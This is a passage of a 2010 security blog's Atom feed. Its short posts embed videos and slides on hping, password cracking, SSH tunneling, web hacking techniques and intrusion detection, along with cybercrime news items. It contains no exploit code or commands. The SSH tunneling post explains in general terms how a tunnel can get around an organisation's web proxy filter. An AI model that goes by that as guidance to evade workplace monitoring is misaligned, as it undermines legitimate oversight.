&lt;b&gt;Antirez&lt;/b&gt;). Hping is one of the &lt;i&gt;de facto&lt;/i&gt; tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4262981661577092505?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4262981661577092505/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/hping.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4262981661577092505'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4262981661577092505'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/hping.html' title='Hping'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-489650476885283852</id><published>2010-02-09T00:02:00.004+08:00</published><updated>2010-03-03T14:38:02.351+08:00</updated><title type='text'>NSA.gov Hacked : Epic Fail</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_vUW0F0UxPvk/S3AzjHbhWnI/AAAAAAAAAJM/0ByZiEtmkGQ/s1600-h/nsa-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/_vUW0F0UxPvk/S3AzjHbhWnI/AAAAAAAAAJM/0ByZiEtmkGQ/s320/nsa-hacked.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;I usually dislike and disagree to people who deface websites to state whatever point they want to prove but this one is really an exception. The defacement happened last October 2009 and was kept silent from the general public. This simply proves the poor state of IT security from supposedly one of the most security-knowledgeable agency in the entire planet. How does this happen you may ask? The security industry itself is filled with pretenders with fancy resumes and certifications who actually know almost next to none when it comes to real-world security threats. Otherwise, how do you explain being compromised with an 8-year old exploit which any newbie hacker can readily do?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-489650476885283852?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/489650476885283852/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/wwwnsagov-hacked.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/489650476885283852'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/489650476885283852'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/wwwnsagov-hacked.html' title='NSA.gov Hacked : Epic Fail'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_vUW0F0UxPvk/S3AzjHbhWnI/AAAAAAAAAJM/0ByZiEtmkGQ/s72-c/nsa-hacked.jpg' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5818021910587899377</id><published>2010-02-08T16:33:00.004+08:00</published><updated>2010-04-01T13:29:06.902+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>How Password Crackers Work</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/6bNtMPKafk0&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/6bNtMPKafk0&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Password cracking&lt;/b&gt; is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5818021910587899377?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5818021910587899377/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/how-password-crackers-work.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5818021910587899377'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5818021910587899377'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/how-password-crackers-work.html' title='How Password Crackers Work'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1673195658602014279</id><published>2010-02-07T13:02:00.002+08:00</published><updated>2010-03-24T07:30:05.951+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bypassing Firewalls'/><title type='text'>Bypassing Firewalls Using SSH Tunneling</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ngNdmB2WySc&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ngNdmB2WySc&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;An SSH tunnel consists of an encrypted tunnel created through an SSH protocol connection. Users may set up SSH tunnels to tunnel unencrypted traffic over a network through an encrypted channel. For example, Windows machines can share files using the SMB protocol, a non-encrypted protocol. If one were to mount a Microsoft Windows file-system remotely through the Internet, someone snooping on the connection could see transferred files. To mount the Windows file-system securely, one can establish an SSH tunnel that routes all SMB traffic to the remote fileserver through an encrypted channel. Even though the SMB protocol itself contains no encryption, the encrypted SSH channel through which it travels offers security.&lt;br /&gt;To set up an SSH tunnel, one configures an SSH client to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not have the same port number as the remote port.&lt;br /&gt;SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services — so long as a site allows outgoing connections. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which provides the organization with a means of monitoring and controlling what the user sees through the web). But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server. To access the remote web server users would point their browser to http://localhost/.&lt;br /&gt;Some SSH clients support dynamic port forwarding that allows the user to create a SOCKS 4/5 proxy. In this case users can configure their applications to use their local SOCKS proxy server. This gives more flexibility than creating an SSH tunnel to a single port as previously described. SOCKS can free the user from the limitations of connecting only to a predefined remote port and server.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1673195658602014279?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1673195658602014279/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/bypassing-firewalls-using-ssh-tunneling.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1673195658602014279'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1673195658602014279'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/bypassing-firewalls-using-ssh-tunneling.html' title='Bypassing Firewalls Using SSH Tunneling'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8541727523417204347</id><published>2010-02-06T18:09:00.001+08:00</published><updated>2010-02-06T18:09:41.914+08:00</updated><title type='text'>Top Ten Web Hacking Techniques of 2008</title><content type='html'>&lt;div id="__ss_1459469" style="text-align: left; width: 425px;"&gt;&lt;object height="355" style="margin: 0px;" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=rsa04212009-090519113345-phpapp02&amp;amp;stripped_title=top-ten-web-hacking-techniques-2008" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=rsa04212009-090519113345-phpapp02&amp;amp;stripped_title=top-ten-web-hacking-techniques-2008" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8541727523417204347?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8541727523417204347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/top-ten-web-hacking-techniques-of-2008.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8541727523417204347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8541727523417204347'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/top-ten-web-hacking-techniques-of-2008.html' title='Top Ten Web Hacking Techniques of 2008'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-9122994025949612889</id><published>2010-02-06T18:07:00.002+08:00</published><updated>2010-02-06T18:07:59.886+08:00</updated><title type='text'>Top Ten Hacks of 2007</title><content type='html'>&lt;div id="__ss_548591" style="text-align: left; width: 425px;"&gt;&lt;object height="355" style="margin: 0px;" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=njtop10hacks2007-1218314927321357-9&amp;amp;stripped_title=top-ten-hacks-of-2007" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=njtop10hacks2007-1218314927321357-9&amp;amp;stripped_title=top-ten-hacks-of-2007" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-9122994025949612889?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/9122994025949612889/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/top-ten-hacks-of-2007.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/9122994025949612889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/9122994025949612889'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/top-ten-hacks-of-2007.html' title='Top Ten Hacks of 2007'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8843591662224346705</id><published>2010-02-06T17:52:00.003+08:00</published><updated>2010-04-06T10:05:32.714+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Intranet'/><title type='text'>Hacking Intranet Websites from the Outside</title><content type='html'>&lt;img border="0" height="0" src="http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNjU*NDk5MDkzMTImcHQ9MTI2NTQ*OTkyMTg5MCZwPTEwMTkxJmQ9c3NfZW1iZWQmZz*yJm89ZGQxOGNkYjBhZDE1/NGQyZGE4Zjg4YjVkNTYwNmM1ODcmb2Y9MA==.gif" style="height: 0px; visibility: hidden; width: 0px;" width="0" /&gt;&lt;br /&gt;&lt;div id="__ss_548593" style="text-align: left; width: 425px;"&gt;&lt;object height="355" style="margin: 0px;" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=intrantethackingblackhat-usa-08012007-1218314071458447-8&amp;amp;stripped_title=hacking-intranet-websites-from-the-outside-take-2" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=intrantethackingblackhat-usa-08012007-1218314071458447-8&amp;amp;stripped_title=hacking-intranet-websites-from-the-outside-take-2" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8843591662224346705?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8843591662224346705/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/hacking-intranet-websites-from-outside.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8843591662224346705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8843591662224346705'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/hacking-intranet-websites-from-outside.html' title='Hacking Intranet Websites from the Outside'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5375506729307575996</id><published>2010-02-06T11:44:00.000+08:00</published><updated>2010-02-06T11:44:46.969+08:00</updated><title type='text'>Cybercrime in the Middle East on the rise</title><content type='html'>&lt;div style="line-height: normal; text-align: justify;"&gt;Beirut (RPN) - Data protection and IT security is of increasing concern in the Middle East, where current research reveals an alarming upswing in cybercrime, with Saudi Arabia, the UAE, and Egypt topping the list as the most vulnerable to malicious internet attacks.&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;Internet security experts have classified the MENA region as one of the most vulnerable in the world to internet crime.&amp;nbsp; As one of the world’s fastest growing economic hubs and a region where business activity is characterized by an explosion of corporate data, protecting sensitive information is becoming a vital concern from legal, financial, and economic perspectives.&amp;nbsp;&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;Johnny Karam is the MENA region director for Symantec, an internet security firm.&amp;nbsp; In an interview with RPN, he emphasized the growing threats presented by the increasingly sophisticated activity of cybercriminals.&amp;nbsp;&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;"Cybercrime is certainly on the rise in the MENA region, and has spawned an underground economy, so to speak, where the goods traded include credit card information, active bank account details, and full-blown identities,” Karam said.&amp;nbsp;&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;This is an organized environment, where specialists are recruited for their ability to hack or phish for information.&amp;nbsp;&amp;nbsp; Depending on its country of origin and other specifics, full credit card details – including acct number, full name, expiry date and security code, might sell for between 1 and ten dollars.&amp;nbsp; Full active bank account information can be purchased for as little as ten dollars.&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;Symantec’s research for 2008 ranked Egypt the most vulnerable of 230 countries sampled in terms of vulnerability to malicious acts, including virus transmission, hacking, spamming, and phishing.&amp;nbsp; Lebanon ranked 93.&amp;nbsp;&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;But Karam warns against the assumption that malicious activity originates only from outside the business being targeted, emphasizing a link between tough economic conditions and the upswing in cybercrime:&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;"With the difficult economic climate, many businesses are looking at the need to downsize.&amp;nbsp; They face the risk of information diversion as staff is downsized.&amp;nbsp; Confidential data may be diverted, either intentionally, or unintentionally.&amp;nbsp; The direct financial losses can be huge, as can the loss to a company’s brand name its customer list, or its advantage over competitors,” he explains.&lt;/div&gt;&lt;div style="line-height: normal; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;Read more at : http://www.rpnnews.com/Story.aspx?StoryID=2046&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5375506729307575996?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5375506729307575996/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/cybercrime-in-middle-east-on-rise.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5375506729307575996'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5375506729307575996'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/cybercrime-in-middle-east-on-rise.html' title='Cybercrime in the Middle East on the rise'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5907066240722280976</id><published>2010-02-06T10:13:00.001+08:00</published><updated>2010-04-06T10:04:24.335+08:00</updated><title type='text'>Intrusion Detection Definitions</title><content type='html'>&lt;div&gt;&lt;object height="354" id="player" width="425"&gt;&lt;param name="movie" value="http://www.authorstream.com/player.swf?p=Hufflepuff-10692-Intrusion-Detection-Definitions-intrusiondetectiondefinitions-ppt-powerpoint" /&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://www.authorstream.com/player.swf?p=Hufflepuff-10692-Intrusion-Detection-Definitions-intrusiondetectiondefinitions-ppt-powerpoint" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="354"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;div style="font-family: arial; font-size-adjust: none; font-size: 11px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&lt;a&amp;nbsp;&amp;nbsp; href="http://upload.authorstream.com/multipleupload/" target="_blank"&gt;&lt;br /&gt;&lt;/a&amp;nbsp;&amp;nbsp;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5907066240722280976?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5907066240722280976/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/intrusion-detection-definitions.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5907066240722280976'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5907066240722280976'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/intrusion-detection-definitions.html' title='Intrusion Detection Definitions'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2742024022001073970</id><published>2010-02-06T10:09:00.000+08:00</published><updated>2010-02-06T10:09:33.655+08:00</updated><title type='text'>Firewall and Perimeter Security</title><content type='html'>&lt;div&gt;&lt;h3 style="margin: 3px; padding: 0px;"&gt;&lt;a href="http://www.authorstream.com/Presentation/Hufflepuff-10681-5-Firewalls-IDS-Firewall-Perimeter-Security-firewalls-and-ids-ppt-powerpoint/" target="_blank"&gt; &lt;/a&gt;&lt;/h3&gt;&lt;object height="354" id="player" width="425"&gt;&lt;param name="movie" value="http://www.authorstream.com/player.swf?p=Hufflepuff-10681-5-Firewalls-IDS-Firewall-Perimeter-Security-firewalls-and-ids-ppt-powerpoint" /&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://www.authorstream.com/player.swf?p=Hufflepuff-10681-5-Firewalls-IDS-Firewall-Perimeter-Security-firewalls-and-ids-ppt-powerpoint" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="354"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;div style="font-family: arial; font-size-adjust: none; font-size: 11px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&lt;a&amp;nbsp;&amp;nbsp; href="http://upload.authorstream.com/multipleupload/" target="_blank"&gt;&lt;br /&gt;&lt;/a&amp;nbsp;&amp;nbsp;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2742024022001073970?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2742024022001073970/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/firewall-and-perimeter-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2742024022001073970'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2742024022001073970'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/firewall-and-perimeter-security.html' title='Firewall and Perimeter Security'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5808627028352437410</id><published>2010-02-06T09:54:00.003+08:00</published><updated>2010-02-24T22:14:38.763+08:00</updated><title type='text'>US bill seeks cybersecurity scholarships : Send your kid to hacker school</title><content type='html'>The US House of Representatives has overwhelmingly passed a bill that would direct almost $400m toward research designed to shore up the nation's cyber security defenses.&lt;br /&gt;The Cybersecurity Enhancement Act would authorize $108.7m over five years to establish a cybersecurity scholarship program. In return, students would serve in federal government posts upon graduation.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Read More at http://www.theregister.co.uk/2010/02/04/house_cybersecurity_bill/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5808627028352437410?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5808627028352437410/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/us-bill-seeks-cybersecurity.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5808627028352437410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5808627028352437410'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/us-bill-seeks-cybersecurity.html' title='US bill seeks cybersecurity scholarships : Send your kid to hacker school'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2148526548326308173</id><published>2010-02-04T16:50:00.001+08:00</published><updated>2010-03-26T12:20:07.840+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><title type='text'>Data Mining Using Wireshark</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/2R1DRnu5CxQ&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/2R1DRnu5CxQ&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Data mining&lt;/b&gt; is the process of extracting patterns from data. Data mining is becoming an increasingly important tool to transform these data into information. It is commonly used in a wide range of profiling practices, such as marketing, surveillance, fraud detection and scientific discovery.&lt;br /&gt;Data mining can be used to uncover patterns in data but is often carried out only on &lt;i&gt;samples&lt;/i&gt; of data. The mining process will be ineffective if the samples are not a good representation of the larger body of data. Data mining cannot show up patterns that may be present in the larger body of data if those patterns are not present in the sample being "mined". Inability to find patterns may become a cause for some disputes between customers and service providers. Therefore data mining is not fool proof but may be useful if sufficiently representative data samples are collected. The discovery of a particular pattern in a particular set of data does not necessarily mean that a pattern is found elsewhere in the larger data from which that sample was drawn. An important part of the process is the verification and validation of patterns on other samples of data.&lt;br /&gt;The term data mining has also been used to describe &lt;i&gt;data dredging&lt;/i&gt; and &lt;i&gt;data snooping&lt;/i&gt;. However, dredging and snooping can be (and sometimes are) used as exploratory tools when developing and clarifying hypotheses.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2148526548326308173?l=pinoysecurity.blogspot.com' alt='' 